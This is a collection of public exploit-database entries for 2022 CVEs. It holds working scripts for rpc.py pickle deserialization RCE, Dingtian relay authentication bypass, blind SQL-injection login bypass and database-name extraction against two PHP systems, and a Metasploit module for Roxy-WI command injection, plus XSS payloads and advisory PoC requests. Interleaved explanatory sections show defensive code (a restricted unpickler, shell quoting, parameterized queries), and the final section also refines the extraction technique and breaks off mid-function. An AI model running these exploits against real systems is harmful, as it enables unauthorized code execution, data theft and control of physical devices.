<pre><code># Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)<br /># Google Dork: N/A<br /># Date: 2022-07-12<br /># Exploit Author: Elias Hohl<br /># Vendor Homepage: https://github.com/abersheeran<br /># Software Link: https://github.com/abersheeran/rpc.py<br /># Version: v0.4.2 - v0.6.0<br /># Tested on: Debian 11, Ubuntu 20.04<br /># CVE : CVE-2022-35411<br /><br />import requests<br />import pickle<br /><br /># Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py<br /># The client picks the wire format through the "serializer" request header; with<br /># "pickle" the server deserializes the body with pickle, so an object whose<br /># __reduce__ returns os.system runs an arbitrary command during unpickling.<br /><br />HOST = "127.0.0.1:65432"<br /><br />URL = f"http://{HOST}/sayhi"<br /><br />HEADERS = {<br />    "serializer": "pickle"<br />}<br /><br /><br />def generate_payload(cmd):<br /><br />    class PickleRce(object):<br />        def __reduce__(self):<br />            import os<br />            return os.system, (cmd,)<br /><br />    # Pickling only records the call (os.system, (cmd,)); it executes on the<br />    # server when the stream is loaded.<br />    payload = pickle.dumps(PickleRce())<br /><br />    print(payload)<br /><br />    return payload<br /><br /><br />def exec_command(cmd):<br /><br />    payload = generate_payload(cmd)<br /><br />    requests.post(url=URL, data=payload, headers=HEADERS)<br /><br /><br />def main():<br />    exec_command('curl http://127.0.0.1:4321')<br />    # exec_command('uname -a')<br /><br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
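The PoC above works because pickle resolves and calls whatever global the stream names. The following is an added example, not rpc.py's code and not the fix its maintainers shipped: a server-side unpickler that restricts `find_class` to an explicit allow-list, so the same `os.system` gadget is refused before anything executes while ordinary data still round-trips. The allow-list contents and the `safe_loads` name are this example's own choices.

```python
"""Added example (not rpc.py's code): refuse dangerous pickle globals.

pickle.loads() imports and calls any callable named in the stream, which
is exactly what the PoC relies on (__reduce__ -> os.system). A hardened
server should not accept pickle from untrusted peers at all (JSON or
msgpack instead); where pickle is unavoidable, find_class must only
resolve an explicit allow-list. This is illustrative code.
"""
import io
import os
import pickle

# (module, name) pairs the unpickler may resolve. Everything else, including
# posix.system / nt.system and subprocess.Popen, is refused.
SAFE_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
    ("builtins", "tuple"),
    ("builtins", "str"),
    ("builtins", "int"),
    ("builtins", "float"),
    ("builtins", "bool"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves globals listed in SAFE_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load global {module}.{name}")


def safe_loads(data: bytes):
    """Deserialize untrusted bytes with the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class PickleRce:
    """Same gadget as the PoC: the stream names os.system as a global."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return os.system, (self.cmd,)


def demo():
    """Return (benign_roundtrip_ok, malicious_rejected)."""
    benign = pickle.dumps({"name": "alice", "ids": [1, 2, 3]})
    roundtrip_ok = safe_loads(benign) == {"name": "alice", "ids": [1, 2, 3]}

    # pickle.dumps only records the call; nothing runs here. pickle.loads()
    # would execute "id"; safe_loads refuses the global instead.
    malicious = pickle.dumps(PickleRce("id"))
    try:
        safe_loads(malicious)
        rejected = False
    except pickle.UnpicklingError:
        rejected = True
    return roundtrip_ok, rejected


if __name__ == "__main__":
    print(demo())
```

The check happens at `find_class` time, before the `REDUCE` opcode runs, which is why the refused stream has no side effects. Plain containers never consult `find_class` (they are built from container opcodes), so the allow-list can be kept very small.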
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Incorrect Authorization [CWE-863]<br />Date found: 2022-07-13<br />Date published: 2022-07-22<br />CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)<br />CVE: CVE-2022-2461<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />When installed Transposh comes with a set of pre-configured options, one of these<br />is the "Who can translate" setting under the "Settings" tab, which by default<br />allows "Anonymous" users to add translations via the plugin's "tp_translation"<br />ajax action.<br /><br />Successful exploits can allow an unauthenticated attacker to add translations to<br />the WordPress site and thereby influence what is actually shown on the site.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept adds a new translation<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: [host]<br />Content-Length: 75<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0<br /><br />action=tp_translation&ln0=en&sr0=rcesecurity.com&items=1&tk0=rcesecurity.com&tr0=rcesecurity.com<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-13: Discovery of the vulnerability<br />2022-07-13: CVE requested from WPScan (CNA)<br />2022-07-18: No response from WPScan<br />2022-07-18: CVE requested from Wordfence (CNA) instead<br />2022-07-18: Sent note to vendor<br />2022-07-18: Wordfence assigns CVE-2022-2461<br />2022-07-20: Since there are currently no plans to provide fixes at all:<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/<br /></code></pre>
<pre><code># Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass<br /># Google Dork: NA<br /># Date: 13th July 2022<br /># Exploit Author: Victor Hanna (Trustwave SpiderLabs)<br /># Author Github Page: https://9lyph.github.io/CVE-2022-29593/<br /># Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html<br /># Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download<br /># Version: V3.1.276A<br /># Tested on: MAC OSX<br /># CVE : CVE-2022-29593<br /><br />#!/usr/local/bin/python3<br /># Author: Victor Hanna (SpiderLabs)<br /># DingTian DT-R002 2CH Smart Relay<br /># CWE-294 - Authentication Bypass by Capture-replay<br /># A captured relay_cgi.cgi request, replayed with pwd=0, switches the relays<br /># without valid authentication.<br /><br />import requests<br />import sys<br />import os<br />import time<br />from colorama import Fore, Style<br /><br />from urllib3.exceptions import InsecureRequestWarning<br />requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />def banner():<br />    print("[+]********************************************************************************[+]")<br />    print("| Author : Victor Hanna (9lyph)[" + Fore.RED + "SpiderLabs" + Style.RESET_ALL + "]\t\t\t\t\t |")<br />    print("| Description: DingTian DT-R002 2CH Smart Relay |")<br />    print("| Usage : " + sys.argv[0] + " <host> <relay#> |")<br />    print("[+]********************************************************************************[+]")<br /><br />def main():<br />    os.system('clear')<br />    banner()<br />    urlRelay1On = "http://" + host + "/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"<br />    urlRelay1Off = "http://" + host + "/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"<br />    urlRelay2On = "http://" + host + "/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"<br />    urlRelay2Off = "http://" + host + "/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"<br /><br />    # Headers copied from the captured browser request that is being replayed.<br />    headers = {<br />        "Host": host,<br />        "User-Agent": "9lyph/3.0",<br />        "Accept": "*/*",<br />        "Accept-Language": "en-US,en;q=0.5",<br />        "Accept-Encoding": "gzip, deflate",<br />        "DNT": "1",<br />        "Connection": "close",<br />        "Referer": "http://" + host + "/relay_cgi.html",<br />        "Cookie": "session=4463009"<br />    }<br /><br />    print(Fore.YELLOW + "[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")<br />    for i in range(5):<br />        time.sleep(1)<br />        print(Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")<br />    try:<br />        if relay == "1":<br />            print(Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)<br />            requests.get(urlRelay1On, headers=headers, timeout=10)<br />            time.sleep(5)<br />            print(Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)<br />            requests.get(urlRelay1Off, headers=headers, timeout=10)<br />            print(Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")<br />        elif relay == "2":<br />            print(Fore.GREEN + "\n[+] Relay 2 switched on !" + Style.RESET_ALL)<br />            requests.get(urlRelay2On, headers=headers, timeout=10)<br />            time.sleep(5)<br />            print(Fore.GREEN + "[+] Relay 2 switched off !" + Style.RESET_ALL)<br />            requests.get(urlRelay2Off, headers=headers, timeout=10)<br />            print(Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")<br />        else:<br />            print(Fore.RED + "[!] No such relay" + Style.RESET_ALL)<br />    except KeyboardInterrupt:<br />        sys.exit(1)<br />    except requests.exceptions.Timeout:<br />        print("[!] Connection to host timed out !")<br />        sys.exit(1)<br />    except Exception as e:<br />        print(Fore.RED + "[+] You came up short I'm afraid ! (" + str(e) + ")" + Style.RESET_ALL)<br /><br />if __name__ == "__main__":<br />    if len(sys.argv) > 2:<br />        host = sys.argv[1]<br />        relay = sys.argv[2]<br />        main()<br />    else:<br />        print(Fore.RED + "[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Cross-Site Scripting [CWE-79]<br />Date found: 2021-08-19<br />Date published: 2022-07-22<br />CVSSv3 Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br />CVE: CVE-2021-24911<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.7 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin's ajax action "tp_translation" which is available to authenticated or<br />unauthenticated users (see CVE-2022-2461) allows to submit new translations.<br /><br />Translations submitted this way are shown on the Transposh administrative<br />interface on the pages "tp_main" and "tp_editor". However, since the plugin does<br />not properly validate and sanitize the submitted translation, arbitrary Javascript<br />code can be permanently injected and executed directly within the backend across<br />all users visiting the page with the roles of at least "Subscriber" and up to<br />"Administrator".<br /><br />This offers a wide range of possible attacks, such as redirecting the user to a<br />malicious page, spoofing content on the page, or attacking the browser and its<br />plugins.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />The following PoC adds a new translation:<br /><br /><html><br /> <body><br /> <form action="http://[host]/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="tp_translation" /><br /> <input type="hidden" name="ln0" value="en" /><br /> <input type="hidden" name="sr0" value="0" /><br /> <input type="hidden" name="items" value="1" /><br /> <input type="hidden" name="tk0" value="xss<script>alert(1337)</script>" /><br /> <input type="hidden" name="tr0" value="test" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />Update the plugin to version 1.0.8.1<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2021-08-19: Discovery of the vulnerability<br />2021-08-20: Contacted the vendor via their contact form<br />2021-08-20: Vendor response<br />2021-08-20: Sent all the PoC exploits<br />2021-08-20: Vendor acknowledges the issues<br />2021-09-14: Requested status update from vendor<br />2021-10-07: No response from vendor, requested status update again<br />2021-10-25: CVE requested from WPScan (CNA)<br />2021-10-27: WPScan assigns CVE-2021-24911<br />2022-02-22: Vendor releases 1.0.8, which fixes this vulnerability<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://transposh.org/version-1-0-8-thanks-julien/<br />https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)<br /># Date: 21/07/2022<br /># Exploit Author: Steffin Stanly<br /># Vendor Homepage: https://github.com/lesterchan/wp-useronline<br /># Software Link: https://wordpress.org/plugins/wp-useronline/<br /># Version: <=2.87.6<br /># Tested on: Windows<br /><br />How to reproduce the vulnerability:<br /><br />1. Install WordPress 6.0.1.<br />2. Install and activate the WP-UserOnline plugin.<br />3. Navigate to Settings >> WP-UserOnline and enter data into the "User(s) Browsing Site" field.<br />4. Add the following payload and save the changes: "><script>alert(1)</script><br />5. The payload is stored in the database without sanitization. Whenever the setting is rendered again, for example on the dashboard, the JavaScript executes and an alert pops up.<br /><br /></code></pre>
<pre><code># Exploit Title: Loan Management System - Stored XSS on several parameters<br /># Date: 28/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: sourcecodester<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br />The following scripts and parameters are affected; each value is stored and later rendered without encoding:<br /><br />addUser.php<br />- firstname<br />- lastname<br /><br />save_ltype.php<br />- ltype_name<br />- ltype_desc<br /><br />save_borrower.php<br />- firstname<br />- middlename<br />- lastname<br />- address<br /><br />The payload used to inject is "/><svg/onload=alert(document.cookie)><br /></code></pre>
<pre><code># Exploit Title: Loan Management System - SQL Injection via login page<br /># Date: 28/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: sourcecodester<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br /># The username parameter of the login page is injectable. The login can be<br /># bypassed with the boolean payload below, which grants access as Admin, the<br /># highest privilege level.<br /><br /># Payload --> 'or 2=2#<br /><br /># A successful login is answered with the JavaScript snippet in SUCCESS and a<br /># failed one is not, which gives a boolean oracle. The script below uses it to<br /># retrieve the database name one character at a time.<br /><br />import requests, string, sys, warnings<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />warnings.simplefilter('ignore', InsecureRequestWarning)<br /><br />SUCCESS = "<script>alert('Login Successful')</script><script>window.location='home.php'</script>"<br /><br />req = requests.Session()<br /><br />def target_url(ip):<br />    return "http://%s/LMS/login.php" % ip<br /><br />def post_login(ip, username, password):<br />    data = {'username': username, 'password': password, 'login': ''}<br />    return req.post(target_url(ip), data=data).text<br /><br />def login(ip, username, password):<br />    if 'Login Successful' in post_login(ip, username, password):<br />        print("[$] Success Login with credentials " + username + ":" + password)<br />    else:<br />        print("[$] Failed Login with credentials " + username + ":" + password)<br /><br />def check_injection(ip, password):<br />    # A false condition must fail and a true one must log in; only then is the<br />    # response usable as a boolean oracle.<br />    false_resp = post_login(ip, "'or 1=2#", password)<br />    true_resp = post_login(ip, "'or 2=2#", password)<br /><br />    if false_resp != SUCCESS and true_resp == SUCCESS:<br />        print("[##] SQLI Boolean-Based Present at username field :)")<br />    else:<br />        print("[##] No SQLI :)")<br /><br />def brute(ip, password):<br />    length = 0<br /><br />    # Find the length of the database name (1-9).<br />    for i in range(1, 10):<br />        payload = "'or 2=2 and length(database())='" + str(i) + "'#"<br />        if post_login(ip, payload, password) == SUCCESS:<br />            print("[##] The correct length of DB name is " + str(i))<br />            length = i<br />            break<br />        print("[##] The length of DB name " + str(i) + " is wrong")<br /><br />    # Recover one character per position from a lowercase + underscore charset.<br />    chars = list(string.ascii_lowercase) + ['_']<br />    dbname = []<br />    for i in range(length):<br />        for c in chars:<br />            payload = "'or 2=2 and substring(database()," + str(i + 1) + ",1)='" + c + "'#"<br />            if post_login(ip, payload, password) == SUCCESS:<br />                dbname.append(c)<br />                print("[+] The " + str(i + 1) + " char of DB name is " + c)<br />                break<br /><br />    dbname = ''.join(dbname)<br /><br />    print("[+] Database name retrieved --> " + dbname)<br />    print("[+] Bypass completed :)")<br />    print("[+] Bypass payload can be used is \n'or 2=2#")<br /><br />    username = "'or 2=2#"<br />    print("\nRetry to login with new payload in username field")<br />    login(ip, username, password)<br /><br />if __name__ == "__main__":<br />    print(" _____ _ __ ")<br />    print(r" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _")<br />    print(r" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")<br />    print(r" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")<br />    print(r"/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ")<br />    print(" /____/ \n\n")<br /><br />    try:<br />        ip = sys.argv[1].strip()<br />        username = sys.argv[2].strip()<br />        password = sys.argv[3].strip()<br /><br />        login(ip, username, password)<br />        check_injection(ip, password)<br />        brute(ip, password)<br /><br />    except IndexError:<br />        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])<br />        print("[-] Example: %s 192.168.149.130 admin admin123" % sys.argv[0])<br />        sys.exit(-1)<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability in Roxy-WI<br /> prior to version 6.1.1.0. Successful exploitation results in remote code execution<br /> under the context of the web server user.<br /><br /> Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Nuri Çilengir <nuri[at]prodaft.com>', # Author & Metasploit module<br /> ],<br /> 'References' => [<br /> ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory<br /> ['URL', 'https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532'], # Additional Information<br /> ['URL', 'https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755'], # Patch<br /> ['CVE', '2022-31137']<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'WfsDelay' => 25<br /> },<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Linux (Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :dropper<br /> }<br /> ]<br /> ],<br /> 'CmdStagerFlavor' => ['printf'],<br /> 'DefaultTarget' => 0,<br /> 
'Privileged' => false,<br /> 'DisclosureDate' => '2022-07-06',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(443),<br /> OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])<br /> ]<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> return send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),<br /> 'vars_post' => {<br /> 'serv' => '127.0.0.1',<br /> 'ipbackend' => "\"; #{cmd} ;#",<br /> 'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),<br /> 'backend_server' => '127.0.0.1'<br /> }<br /> }, 10<br /> )<br /> rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT<br /> return nil<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} is vulnerable!")<br /><br /> res = execute_command('id')<br /><br /> return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res<br /><br /> if res.code == 200 && res.body =~ /uid=\d+\(.+\)/<br /> print_status("#{peer} is vulnerable!")<br /> return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')<br /> elsif res.code == 200<br /> return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')<br /> else<br /> return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")<br /> end<br /> end<br /><br /> def exploit<br /> print_status('Exploiting...')<br /> case target['Type']<br /> when :in_memory<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
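The module's `execute_command` injects `"; <cmd> ;#` into the `ipbackend` field: the leading double quote closes the argument the value was interpolated into, `;` ends that command, and `#` comments out the remainder of the line. The following is an added example, not Roxy-WI's code: a minimal stand-in for that pattern, run with a harmless `echo` instead of `id`, next to two hardened versions. The assumption that the handler quoted the value inside a shell command line is this example's, drawn only from the shape of the payload.

```python
"""Added example, not Roxy-WI's code: the shell-injection pattern the
module above exploits, next to two hardened versions.

Assumption (illustrative stand-in for the vulnerable handler): the
ipbackend form field was interpolated into a double-quoted shell argument
and the string was run through sh. The module's payload  "; <cmd> ;#
closes that quote, appends its own command and comments out the rest.
"""
import ipaddress
import re
import shlex
import subprocess


def run_vulnerable(ipbackend):
    """Interpolate the field into a shell command line and run it via sh."""
    cmd = f'echo "backend {ipbackend}"'  # the value can close the quotes
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_quoted(ipbackend):
    """Same shell invocation, but the value is quoted for the shell first.

    shlex.quote wraps the value in single quotes and escapes embedded ones,
    so metacharacters stay inside one argument. Defence in depth only:
    validation and a shell-free call (below) are the real fix."""
    cmd = "echo " + shlex.quote("backend " + ipbackend)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(ipbackend):
    """Validate the value as an IP address, then pass argv without a shell.

    ipaddress.ip_address() raises ValueError for anything that is not a
    literal IPv4/IPv6 address, and an argv list never reaches a shell
    parser, so there is no syntax for the input to break out of."""
    ip = ipaddress.ip_address(ipbackend)
    return subprocess.run(["echo", f"backend {ip}"], capture_output=True, text=True).stdout


def hardened_rejects(ipbackend):
    """True if run_hardened refuses the value."""
    try:
        run_hardened(ipbackend)
        return False
    except ValueError:
        return True


def looks_like_id_output(body):
    """Same test the module's check() applies to the response body."""
    return re.search(r"uid=\d+\(.+\)", body) is not None


# Harmless stand-in for the module's  "; id ;#  payload.
PAYLOAD = '"; echo INJECTED ;#'

if __name__ == "__main__":
    print(run_vulnerable(PAYLOAD), end="")  # second output line is INJECTED
    print(run_quoted(PAYLOAD), end="")      # one literal line, nothing executed
    print("hardened rejects payload:", hardened_rejects(PAYLOAD))
```

Under the vulnerable builder the shell sees three statements (`echo "backend "`, `echo INJECTED`, a comment), which is exactly how the module turns a form field into `id`. The quoted variant keeps the whole value inside one argument; the validated, shell-free variant never gives the input a parser to exploit.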
<pre><code># Exploit Title: Hospital Information System - SQL Injection via login page<br /># Date: 25/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: https://code-projects.org<br /># Software Link: https://download-media.code-projects.org/2019/11/HOSPITAL_INFORMATION_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br /># The password parameter of the login handler is injectable. The handler<br /># answers "success" when the query returns a row, which gives a boolean<br /># oracle; the script below uses it to retrieve the database name one<br /># character at a time.<br /><br />import requests, string, sys, warnings<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />warnings.simplefilter('ignore', InsecureRequestWarning)<br /><br />SUCCESS = "success"<br /><br />req = requests.Session()<br /><br />def target_url(ip):<br />    return "http://%s/HIS/includes/users/UsersController.php" % ip<br /><br />def post_login(ip, username, password):<br />    data = {'type': 'login', 'username': username, 'password': password}<br />    return req.post(target_url(ip), data=data).text<br /><br />def login(ip, username, password):<br />    if SUCCESS in post_login(ip, username, password):<br />        print("[$] Success Login with credentials " + username + ":" + password)<br />    else:<br />        print("[$] Failed Login with credentials " + username + ":" + password)<br /><br />def check_injection(ip, username):<br />    # A false condition must fail and a true one must succeed; only then is<br />    # the response usable as a boolean oracle.<br />    false_resp = post_login(ip, username, "'or 1=2#")<br />    true_resp = post_login(ip, username, "'or 1=1#")<br /><br />    if false_resp != SUCCESS and true_resp == SUCCESS:<br />        print("[##] SQLI Boolean-Based Present at password field :)")<br />    else:<br />        print("[##] No SQLI :)")<br /><br />def brute(ip, username):<br />    length = 0<br /><br />    # Find the length of the database name (1-9).<br />    for i in range(1, 10):<br />        payload = "'or 1=1 and length(database())='" + str(i) + "'#"<br />        if post_login(ip, username, payload) == SUCCESS:<br />            print("[##] The correct length of DB name is " + str(i))<br />            length = i<br />            break<br />        print("[##] The length of DB name " + str(i) + " is wrong")<br /><br />    # Recover one character per position from a lowercase charset.<br />    dbname = []<br />    for i in range(length):<br />        for c in string.ascii_lowercase:<br />            payload = "'or 1=1 and substring(database()," + str(i + 1) + ",1)='" + c + "'#"<br />            if post_login(ip, username, payload) == SUCCESS:<br />                dbname.append(c)<br />                print("[+] The " + str(i + 1) + " char of DB name is " + c)<br />                break<br /><br />    dbname = ''.join(dbname)<br /><br />    print("[+] Database name retrieved --> " + dbname)<br />    print("[+] Bypass completed :)")<br />    print("[+] Bypass payload can be used is \n'or 1=1#")<br /><br />    password = "'or 1=1#"<br />    print("\nRetry to login with new payload in password field")<br />    login(ip, username, password)<br /><br />if __name__ == "__main__":<br />    print(" _____ _ __ ")<br />    print(r" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _")<br />    print(r" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")<br />    print(r" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")<br />    print(r"/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ")<br />    print(" /____/ \n\n")<br /><br />    try:<br />        ip = sys.argv[1].strip()<br />        username = sys.argv[2].strip()<br />        password = sys.argv[3].strip()<br /><br />        login(ip, username, password)<br />        check_injection(ip, username)<br />        brute(ip, username)<br /><br />    except IndexError:<br />        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])<br />        print("[-] Example: %s 192.168.100.x admin admin123" % sys.argv[0])<br />        sys.exit(-1)<br /></code></pre>
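Both the Loan Management System and the Hospital Information System scripts above extract the database name the same way: one request per charset candidate, 26 lowercase letters (plus `_` in the LMS script), so a character outside that set is never found. The following is an added example, not either script: the same boolean oracle driven by bisection on the character's code point, which covers all printable ASCII in about seven requests per character, beside the parameterized query that closes the hole. An in-memory sqlite database stands in for the vulnerable MySQL login (this example's assumption); sqlite's `unicode()`, `substr()` and `--` play the roles of MySQL's `ascii()`, `substring()` and `#`, and a subquery for the admin password replaces `database()`. The table contents are constructed sample data.

```python
"""Added example, not the LMS or HIS script: the boolean-based blind
extraction both scripts perform, generalized to bisection.

An in-memory sqlite database stands in for the vulnerable MySQL login
(assumption): sqlite uses unicode()/substr()/length() and '--' comments
where the scripts use ascii()/substring()/length() and '#', and a
subquery for the admin password replaces database().
"""
import sqlite3

# Constructed sample data.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cr3t_pw')")

# Scalar subquery used as the extraction target.
SECRET = "(SELECT password FROM users WHERE username='admin')"
_requests = {"count": 0}


def login_vulnerable(username, password):
    """String-built query: the pattern behind both scripts' login bypass."""
    sql = f"SELECT id FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(username, password):
    """Parameterized query: the same input is bound as data, never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def oracle(condition):
    """True iff the injected condition holds, i.e. the login 'succeeds'.

    Mirrors the scripts' 'or 1=1 and <cond>#' payload in the username field;
    '--' comments out the trailing AND password='x'."""
    _requests["count"] += 1
    return login_vulnerable(f"' OR 1=1 AND ({condition})--", "x")


def bisect_value(expr, lo, hi):
    """Integer value of SQL expression expr, known to lie in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(expr=SECRET, max_len=64):
    """Recover the string value of expr character by character."""
    length = bisect_value(f"length({expr})", 0, max_len)
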